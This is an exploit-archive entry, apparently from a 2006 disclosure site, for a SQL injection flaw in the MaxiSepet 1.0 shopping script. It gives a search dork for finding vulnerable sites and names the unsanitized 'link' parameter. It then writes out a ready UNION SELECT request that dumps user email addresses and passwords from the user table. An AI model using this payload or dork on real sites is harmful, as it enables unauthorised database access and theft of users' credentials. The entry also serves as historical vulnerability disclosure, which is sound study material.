MaxiSepet <= 1.0 (link) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MaxiSepet <= 1.0 (link) SQL Injection Vulnerability
# Published : 2006-06-11
# Author : nukedx
# Previous Title : free QBoard <= 1.1 (qb_path) Remote File Include Vulnerability
# Next Title : RCblog <= 1.03 (post) Remote Command Execution Exploit

#Method found by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=42
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.

#Dork: "Copyright MaxiSepet ?"

#How: Parameter link did not sanitized properly.

#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL

#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('üye%20adi:%20<b>',email,'</b><br>','Tifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC

# nukedx.com [2006-06-11]

# www.Syue.com [2006-06-11]